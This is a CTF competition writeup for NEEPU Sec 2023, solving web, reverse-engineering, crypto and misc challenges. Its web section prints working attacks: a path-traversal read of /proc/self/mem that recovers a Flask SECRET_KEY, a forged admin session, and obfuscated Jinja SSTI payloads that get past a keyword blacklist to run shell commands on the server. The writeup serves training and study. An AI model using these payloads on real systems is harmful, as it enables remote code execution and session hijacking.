NEEPU Sec 2023 Open Competition writeup

news2024/11/24 3:21:26


Web

Cute Cirno

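My skills are lacking and my head is about to explode.

The source of the Cirno page reveals an arbitrary file read.

A previous competition had an arbitrary file read challenge that was about recovering the SECRET_KEY.

I tried to make it throw an error here, so I requested http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/…/proc/self/mem

Read CuteCirno.py and save it: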

from flask import Flask, request, session, render_template, render_template_string
import os, base64
from NeepuFile import neepu_files

CuteCirno = Flask(__name__,
                  static_url_path='/static',
                  static_folder='static'
                  )

CuteCirno.config['SECRET_KEY'] = str(base64.b64encode(os.urandom(30)).decode()) + "*NeepuCTF*"

@CuteCirno.route('/')
def welcome():
    session['admin'] = 0
    return render_template('welcome.html')


@CuteCirno.route('/Cirno')
def show():
    return render_template('CleverCirno.html')


@CuteCirno.route('/r3aDF1le')
def file_read():
    filename = "static/text/" + request.args.get('filename', 'comment.txt')
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    return neepu_files(filename, start, end)


@CuteCirno.route('/genius')
def calculate():
    if session.get('admin') == 1:
        print(session.get('admin'))
        answer = request.args.get('answer')
        if answer is not None:
            blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
                         'posix', 'builtins', 'namespace','open', 'read', '\\', 'self', 'mro', 'base',
                         'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
                         'include','request', '{{', '}}', '"', 'config','=']
            for i in blacklist:
                if i in answer:
                    answer = "⑨" +"""</br><img src="static/woshibaka.jpg" width="300" height="300" alt="Cirno">"""
                    break
            if answer == '':
                return "你能告诉聪明的⑨, 1+1的answer吗"
            return render_template_string("1+1={}".format(answer))
        else:
            return render_template('mathclass.html')

    else:
        session['admin'] = 0
        return "你真的是我的马斯塔吗?"


if __name__ == '__main__':
    CuteCirno.run('0.0.0.0', 5000, debug=True)

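Note that SECRET_KEY is used here as well.

I found a writeup for the file-session challenge from the 蓝帽杯 (Blue Hat Cup) preliminary round:

https://erroratao.github.io/2022/07/10/File_Session/#%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9B-file-session-%E8%A7%81%E8%A7%A3

Then look at view-source:http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/app/NeepuFile.py

It computes end - start itself.

So the script mentioned for that challenge needs a small modification: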

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re

import requests

# List the process's memory mappings through the file-read endpoint.
url_1 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/maps"
res = requests.get(url_1)
maplist = res.text.split("\n")

for i in maplist:
    # Only readable and writable regions are searched for the runtime SECRET_KEY.
    m = re.match(r"([0-9A-Fa-f]+)-([0-9A-Fa-f]+) rw", i)
    if m is not None:
        start = int(m.group(1), 16)
        end = int(m.group(2), 16)
        # NeepuFile.py computes end - start itself, so both addresses are passed unchanged.
        url_2 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/mem&start={}&end={}".format(
            start, end)
        res_1 = requests.get(url_2)
        # The key always ends with the fixed suffix "*NeepuCTF*".
        if "*NeepuCTF*" in res_1.text:
            print(start)
            print(end)
            print(url_2)

One of the regions contains kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*

from flask import Flask, session

# Key recovered from the memory read above.
SECRET_KEY = "kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*"
app = Flask(__name__)
app.config.update(dict(
    SECRET_KEY=SECRET_KEY,
))


@app.route("/", methods=['GET', 'POST'])
def login():
    # Flask signs the session cookie with SECRET_KEY, so this local app
    # issues a cookie carrying admin = 1 under the same key.
    session['admin'] = 1
    return 'mu'


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=11451)

This gives an admin session: eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g
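What that session value contains, as an added example that is not part of the original writeup: it parses the cookie quoted above and recomputes its signature. The signing scheme (itsdangerous with salt cookie-session and HMAC-SHA1, Flask's defaults) is an assumption, and the function names are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Session value and key quoted in the writeup above.
COOKIE = "eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g"
LEAKED_KEY = "kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*"


def b64url_decode(text: str) -> bytes:
    """URL-safe base64 with the padding stripped, as used in the cookie."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def parse_session(cookie: str) -> dict:
    """Split payload.timestamp.signature and decode the parts that need no key."""
    compressed = cookie.startswith(".")  # a leading dot marks a zlib-compressed payload
    body = cookie[1:] if compressed else cookie
    payload_b64, ts_b64, sig_b64 = body.rsplit(".", 2)
    raw = b64url_decode(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    return {
        "data": json.loads(raw),
        # Assumed to be seconds since the Unix epoch (current itsdangerous releases).
        "issued_at": int.from_bytes(b64url_decode(ts_b64), "big"),
        "signature": b64url_decode(sig_b64),
    }


def signature_ok(cookie: str, secret_key: str, salt: bytes = b"cookie-session") -> bool:
    """Recompute the signature under the assumed Flask defaults and compare in constant time."""
    signed_part, sig_b64 = cookie.rsplit(".", 1)
    # Key derivation "hmac": the signing key is HMAC-SHA1(secret_key, salt).
    derived = hmac.new(secret_key.encode(), salt, hashlib.sha1).digest()
    expected = hmac.new(derived, signed_part.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


if __name__ == "__main__":
    info = parse_session(COOKIE)
    print("payload:", info["data"], "issued_at:", info["issued_at"])
    print("verifies with the leaked key:", signature_ok(COOKIE, LEAKED_KEY))
    print("verifies with another key:", signature_ok(COOKIE, "not-the-key"))
```

The payload is readable without any key because the cookie is signed, not encrypted; the only thing protecting session['admin'] is the secrecy of SECRET_KEY, so a leaked key has to be rotated.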

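Visit genius with this session attached.

SSTI

For reference, see ctfshow SSTI challenge 369 and a challenge from the 网络安全平台测试赛 (a network security platform test competition).

Use {%print((lipsum|lower|list))%} to look up the available characters: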

['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '2', 'c', '6', '4', 'b', 'f', '1', '8', '2', '0', '>']

A script then builds __globals__, __getitem__, os, popen and read from these characters.

Because pop is filtered, values are fetched by list indexing instead.

However, when reproducing this there was no character d (when I solved it during the contest lipsum happened to contain one, sob), so read could not be built this way. Take it instead from (lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)

It is found at (lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]

The above executed ls; now look at ls /:

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

There is a readflag and a flag, so readflag presumably has to be executed. First try reading flag (cat /flag):

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[4]~(lipsum|lower|list)[15]~(lipsum|lower|list)[5]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

The result is empty, so /readflag has to be executed:

http://neepusec.fun:28692/genius?answer={%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

All this substitution wore me out. On to Revenge.

Cute Cirno(Revenge)

Same procedure as above.

proc/self/cmdline shows that the app.py file being run is named CuteCirnoRev.py.

http://neepusec.fun:28698/r3ADF11e?filename=…/…/…/…/…/app/CuteCirnoRev.py

Everything else, including the payload, stays the same.

Rev

How to use ida?

Just open it in IDA.

Base

Look at encode_1 and encode_2.

encode_1: rot with an offset of 3

encode_2: base64

welcometotheworldofctf

Neepu{welcometotheworldofctf}

How to use python?

import string
from tqdm import tqdm

# Brute-force the four characters whose code points, packed in base 10000, give the target value.
table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                s = i + j + k + h
                if sum(ord(x) * 10000 ** n for n, x in enumerate(s[::-1])) == 110009500490115:
                    print(s)

import hashlib
import string
from tqdm import tqdm

# Brute-force the four remaining unknown characters against the SHA-256 of the flag.
table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                flag = f'Neepu{{Pyth0n_1s_a_t{i}{j}l_{k}1{h}ku}}'.encode()
                m = hashlib.sha256(flag).hexdigest()
                if m == 'a04f00829f27a5ead1c4ae526d6b1b0cec30ed0e56d6d71e9c001d7803e84892':
                    print(flag)  # Neepu{Pyth0n_1s_a_t00l_y1_ku}

IKUN Checker (IKUN检查器)

Open it in dnSpy.

Look at each part in turn.

Decoding with somd5 gives 1998-8-2.

Decoding with somd5 gives jinitaimei.

Join them with a - in between.

Decrypt the AES.

Finally, enter it.

The flag is the sha256 of that input, i.e. Neepu{b8688fc33b5786095dc70a34ad14b9623905185663fa26dcc75d3b6b1f69999e}

junk code

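Junk instructions have been added. When run normally it can indeed be seen printing the second character, so I guessed there is a sleep. The junk instructions are there, but they do not affect this.

NOP it out.

Save and run.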

Neepu{it-1s-not-junk-code-1u-1u-the-qq-bin-mat}

Crypto

FunnyRsa

Seeing e=3, just apply the template directly.

import gmpy2
import binascii

e = 3
n = 508480854372756755913791101745305762457517298159680989644747340327036977578527505318324958633232739687251409520866901608437945927574543155971443209922394847753303798988837755432365056098925797113097436966052676591464802061455795339989784949253878654243424430112737855583276666468348152646780267313723933052043652043457805179867064143032058107197027709609118240936819964179830722897401341043667501298533160902654255596452348828855631402136248161345374217307571507612687845128249648000080509946611349654016724007920186542131491886281036913471846314065665956824568534254734060468248256266109011728508043378818494008953002180704766570040343479609214117050941617109009620565019399761765253703071237034374358239723604390448411521487409469419576049566386525066685041905464761757345225778527338430347014422459954532168552493706796761693553297732745470452288495224654530482329002451540376107539184656257369225752541361996356642232449580990809290287044068126307915255465596308681516279323181254599943979030260297865604529605690218915679197797309258313924963034175283390070634287196300753230812822254122160704736109171545494720552113142650620106205647711854004731168393093254452512276389945341818288720153371447538338764655583233355044033698253
c = 1811190934126864017324358781557112607374925418749516169609783406151778537247582927245777048528376193187995730195136886128337489858508361912939739791856453029029472008503849636323475596821894021085406391087644300429282015652303512547583242875798709634440100351468653278854842376234162516591017755925768811542318681182791159664625408669418924102547889582147686273287037619637618739708338600060067635958832146122636281342410738805977631878905617340110767089538025585058506632889042141695774769826454213414615721715636679099281147824773004445559938086334729812819928608583224897377

i = 0
while True:
    # gmpy2.iroot(x, n) returns (integer n-th root of x, whether the root is exact)
    root, exact = gmpy2.iroot(c + i * n, e)
    if exact:
        m = root
        break
    i += 1

print(binascii.unhexlify(hex(m)[2:]))
#b'Dear OOD PERSON,\n\nNeepu{1nterest1ng_D0_y0u_kn0w?}Welcom to NeepuCTF!G00d luck!!!'

Loss

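The challenge does not seem to have much to do with crypto, so I treated it as misc.

hex(k)[2:] is used without zfill; checking the lengths, ct is missing 2 characters and key is missing 3. So write a script to brute-force it.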

from Crypto.Cipher import AES
from tqdm import tqdm

def DecryAES(ct,key):
    ct,key = bytes.fromhex(ct),bytes.fromhex(key)
    aes = AES.new(key,AES.MODE_ECB)
    m = aes.decrypt(ct)
    return m

ct  = '98691cbec88e449e8bac58e91142269a7da5efa9e7c62848e7135f1150f02a'
key = '8ee2b28564433679d93b82873fe8a'
ct_arr = []
key_arr = []
for i in range(len(ct)+1):
    for j in range(i,len(ct)+1):
        mod_ct = ct[:i] + '0' + ct[i:j] + '0' + ct[j:]
        ct_arr.append(mod_ct)
for i in range(len(key)+1):
    for j in range(i,len(key)+1):
        for k in range(j,len(key)+1):
            mod_key = key[:i] + '0' + key[i:j] + '0' + key[j:k] + '0' + key[k:]
            key_arr.append(mod_key)
for ct2 in tqdm(ct_arr):
    for key2 in key_arr:
        m = DecryAES(ct2,key2)
        if(b'Neepu' in m):
            print(m)


loud

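Same as the leak in d3noisy from the earlier d3 competition.

The official script:

Modified slightly (in fact I spent a long time on this challenge; it was not as simple as the writeup makes it look)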

from sage.all import *
from sympy import nextprime

p=[66467878562792562224887473415011035371976498729276781135103070806273826602147, 87779827664444719705378632508432527366151596527264599732383282214161710342059, 106478845076259796180788022071614290976203859464583466743581048528447954519879, 96059795988661207615203630115134173796188205316583242342092930969746956840537, 76648433583138097341785050433545276046328401071616329410459071963649387342037, 75363807436621723536569872393312030066473340867618075065014040776064056013377, 84549506983821330145587582824091845683589581353932033068622843538281197238321, 111370876180722361599897961586244954018438484624454058266043059162224754345369, 64482965162169334114246637526347201196498007629645251181883638859700004974179, 115737745133463165088409210929201564518908251675851193212090312153202710950611, 65430568356698229457733164116539029669340192339524852345167889932007830803713, 83005759669335703543538842561745612525242745913149020160169673469294684269349, 86695300569990829413494539259312051326564517598709183416846805385774886176327, 87649503475806433108642579024197030978459906709386640769733298397489631575119, 67546279258240068058305769281370224151667980031696762855998467222703960646549, 109277222890519331704406685175081474974918071159722270158398833428598261621993, 94947541482876422720663520475916415155713415168744242709306335577278248129671, 72169704519430039945520319412623531417839608722431394881643470024106954771823, 67960163975784724339119270210646072354375119081204577840800359343098463410911, 99600976311231076437603674530239237427983536499904250636338541144596856152681]
S=[[36006797306819385066479875554093947690583427970449583820207929310836800884907, 42421831928852572111305575764455253114855197661030346257979092292334693704638, 12802758082612276306666301210467012086210333405770973816248015272325645518737, 35891119003347284519077367147618128608424314149438118637710340094202006973607], [69221811235046204007409195125183399115207721139473251108686359647136964539528, 68728546052531932227774742525240050245981893208569278338806756195046394386320, 77378932313251132635143406501260917558950175409375255430759788116685665756853, 52610629088183684552705334542273079173241031671071904128690224212767984326814], [84632180774187758644772651231005808936754972376616591239738706882585325508504, 22245885241129428291065279034982203110690225047634487933389806520943556010139, 65058154300579433325392929157176043693547112910255708084394089838078169979653, 26450521689799343844879689401496427283279097300795496218417820952255310453381], [31743210200723432871171527300926464156713378567872351797727553809801223755669, 13585899089974057026763852048073375117825112528263695778864069316682632842469, 61718974141826995988697061776372539645461814294568567001726256109104825647174, 51180314603392071189287058511013567287870020999513958065031674007822278281592], [54972437884087220348657249916515696089000557932808046438758622081654015388431, 60595394189514447466338506137494568375465810079275014516953880523799578017650, 48290106501584587524538351792623115913538457076946109833703750186838567097829, 75809640108047877199495621711957016420204838905577105767711805228492185803198], [2043782039074334576524460230918369530353673853539675192552828729137718721899, 49835004172676327317136633790276532689791891581739516605994211773520862094089, 74150446127124215081973853925119891529594162176613983713739514646864857274598, 3870903633214309884568064156029910145031131868082685800718700340446754642668], [58530922734504496400650172153260509666806593206632885245359170202099163777029, 
24679955301703325026039585637067957593890919790442322117013190013849632870045, 47461847478301275711387089619360312020232490159064156700718722079533108310495, 78436661760605062831488783213279281637896003485976271847409520316669048162591], [3960169205004685923298734670827529710258905436583484891133449600679523626998, 56971763036590510871648632641525055519742294555040115044720432874482626152527, 7500941845513450196840656641552395008944195976110947855355515297144549893577, 104364444158131675753431216431697712763613996035708348677723420914206545999308], [21090310989423433113256120275297260716078136824734467530250689161392790805917, 59095240674034520085214866457855433129352762312493710903594522366480317145097, 25950268632849909273587896220763105221984980662119437334003683923010964181793, 22214910913289817220594820237750728594412035322558117144502181839908519483813], [6516207309607110723013310828779534786605721487724433166085213573594060054191, 62491095915002854769743893168840271080994195414466604510886959458801333994425, 43298696119722427147738220942971604096101207270771677319478440633957185506012, 95999300849358990419162309412086189707629278626118528491801630061635930409174], [21901937371736027133484836626793049950863305103635439434565692334061323247459, 22177707944556298482781825594816606678702151909926553218938857302296851101061, 37265517992688571580384548897674161792052985496826940853296718063969030761085, 45803015810935362104176472501216732994877801735307247883040947086374864784522], [22887302429552282917137975404437379689230279867683032429064655381687354309967, 63687512791087585071097169701758075850922324857489524802811455099431146712006, 43241233600118761031756067392063544631958472413548145463886944168747993611755, 78540416079875697330277927812643707908744419489483603613867805715379418188382], [83274701456245595041914535781657541250722792681868330743604458671030342631093, 29265221035131869074958665850197081103720257562467498607821734305785454256445, 
19656036104607964818483236621454584533830854692521644548949580232419092579485, 36685991496747026794589417986750583003976651961717444764360736602328859939203], [7197271849934394038490337096465830651019854061628854994110403632096530818658, 13199583400545916173897024693988359528617080325104182927755868559199746329580, 76705903744610047925943025263768006533642196751938988456317343613219129386367, 8284847848213860404087592474405055922947517109038702885136704630947806019241], [40192513898904947184731216279798716826510915071804534174239538082671192078053, 756883344718645808681598066443462390307116757281839378450937721653214302485, 46319296839244788373603804279624137323125709215284595152627739510983625831713, 38066834404440733412548216101182968084184940639461830700714702917736840764910], [52459924240743004858678271074727889512634425322058383892565820049302166247484, 1124830903052334805081369416754962375712146318972731973481260141314675294280, 7048586820754100983732909765398789018269542052380424872274364753361851089050, 46261533803791211860667474793341333491934930635468558951890405299902112599717], [23712997405587065505471765580307890926020635436932008780552027395793174460196, 67696894015776789806885369424535665938702806354704500197616129889160343225036, 22335907790107175161378264382954791596027764567679319454957440806458200559861, 76817272441881586284817699756225532359147752598882508352406898668675942956599], [48442733699161048528383543478196401606393182356208996862954079146924798030016, 33988046942702399144226829264100378601075005547176282333019034404108127701223, 3878811651113775226499837109875057444157158981192358109242560352485567236840, 48096508435450140842190594378561970076075899550630622502080370324305787016204], [4661700708549906139665791533582485338344505441635713456342199101346895847315, 57085434497175712126874334119472545667616658739402471396702109228089918012639, 43291903057149273908186130451801222008858189682043034712173498638683726314620, 
43681777323686685006867808938443372833327865869793588659920726812432020143637], [34817244237217626483621974571192315048341502556634007719371004295715069335162, 10855671893795758052388714204250213675262352053079039688785650172729770783108, 55808546957704772545340135312880985328286637622927964296444521648705445287337, 57996505385421171401445757882512186395065784033051493647151141293523405436642]]

n = 20
m = 4
B = 2**4096
P = 1
for i in range(n):
    P *= p[i]
# CRT coefficients: L[i] is 1 mod p[i] and 0 mod every other prime.
L = []
for i in range(n):
    t = inverse_mod(P//p[i], p[i])
    L.append(t*(P//p[i]))

BB = matrix(n*m+1)
BB[0,0] = P
for i in range(n):
    for j in range(m):
        t = i*m + j
        BB[t+1,t+1] = B
        BB[t+1,0] = S[i][j] * L[i]
red = BB.LLL()
with open(r'C:\Users\mumuzi\Desktop\outs.txt','w') as f:
    f.write(str(red))

Opening the output, only the first row is a positive number followed by a bunch of zeros; all the other rows contain negative numbers. Here only flag has a value, whereas in the original challenge N also had 15 values, so the first row is the one that meets the requirement.

So I tried submitting 116926347417973739813389504748758673981034015364501761586986653891072159614466535442285940993424509487983408826535446174908960805420415826892247095629899711028817120829492104752602407109216917926271092220486968841156519990362949657487794025464819714162899699678997721569868660164545620667051526447422139521078040002214106645807945132338049458476984219774549279366132880281262873259579336469061431142093875314095384936916552701093157363813120451972804242781688459725262869243990446191731213239849534613643610956337393952997289528155686740057414072272137510704615005549047461973455194160253722511339247030805640858589842699243553893990352636820643317189483800653004195589918829455999679822736492945367960846445909281065494949166307806389546596789298753332846823642742703456348160285521746213654908420577340508033880925137019362574079782798769495078307996462897694930462678432564135136546708085518325059843563577692800896695337469509988693835802560372443455806502280391274164995314797779082864525968072787575692490640928881743177623466702363671996974454074849781021299229369520112211636727082759319836173414882071943165226884042463530718394000680023200019847602023738930464764671560604546094707989602894519207930387266023700987775382170, and it was accepted.

Misc

First Stop in Jilin (吉林第一站)

Google image search and Baidu image recognition.

For the first picture, text could not be added on the computer, so I used a phone.

Neepu{zhuqueshan_songhuahu_dongbeidianlidaxue}

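Reflection (倒影)

There is a reversed PNG at the end of the file; split it off by hand and then reverse it.

f = open('reflection2.png','rb').read()
fw = open('re.png','wb').write(f[::-1])

The two images look identical, but XORing them directly in stegsolve shows blue lines, so I went straight to a blind watermark.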

Neepu{THe_S3cR3t_UNd3r_t4e_R3fl3Ct10n}

Shiro

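A traffic capture is provided. It contains five very large POST requests; decoding the cmd of each shows one that reads a docx with base64 and another that reads id_ssh.

The parameter that follows neepu is a class file.

Opening it in jadx shows that the response content in the capture is the result of XORing with some key.

Since the capture fetched id_rsa and the header of id_rsa is known, XORing directly yields the key:

th1s_1s_n33pu_K4y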
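The key recovery described above, as an added example that is not part of the original writeup. It assumes the class applies a plain repeating-key XOR and that the file begins with the OpenSSH header line; the plaintext is constructed and the function names are hypothetical.

```python
from itertools import cycle

# Assumed known plaintext: the first line of an OpenSSH private key file.
KNOWN_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----\n"

# Key stated in the writeup, used here only to build a constructed ciphertext.
PAGE_KEY = b"th1s_1s_n33pu_K4y"

# Constructed sample body, not real key material.
SAMPLE_PLAINTEXT = (
    KNOWN_HEADER
    + b"constructed-sample-body-not-a-real-key\n"
    + b"-----END OPENSSH PRIVATE KEY-----\n"
)


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with the key repeated as needed (the same call encrypts and decrypts)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, known_prefix: bytes):
    """Return (key, confirmed) for a repeating XOR key, given the known first bytes.

    confirmed is True only when the known prefix is longer than the key, so the
    repetition was actually observed; otherwise the key may be truncated.
    """
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_prefix))
    # The key is the shortest prefix that, repeated, reproduces the whole keystream.
    for length in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % length] for i in range(len(stream))):
            return stream[:length], length < len(stream)
    return stream, False


if __name__ == "__main__":
    captured = xor_repeat(SAMPLE_PLAINTEXT, PAGE_KEY)
    key, confirmed = recover_key(captured, KNOWN_HEADER)
    print("recovered key:", key, "confirmed:", confirmed)
    print(xor_repeat(captured, key).decode())
```

A header shorter than the key only yields the first part of it, which the confirmed flag reports; any file format with a fixed opening line longer than the key gives the whole key away.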

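Then use it to decrypt the others; the docx can be decrypted.

This gives part2: W0wYoUF1ndMyAn0th3rS3cr3t

The first part then has to be brute-forced. I tried for a long time without success; a hint was then given that it is part of a rockyou password.

With the password recovered, the final flag is Neepu{nroamntiriina_W0wYoUF1ndMyAn0th3rS3cr3t}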

Reborn as a CTFer (重生之我是CTFer)

Just kept answering questions over and over, and somehow it passed after many attempts.

Survey

Anyway, I did it.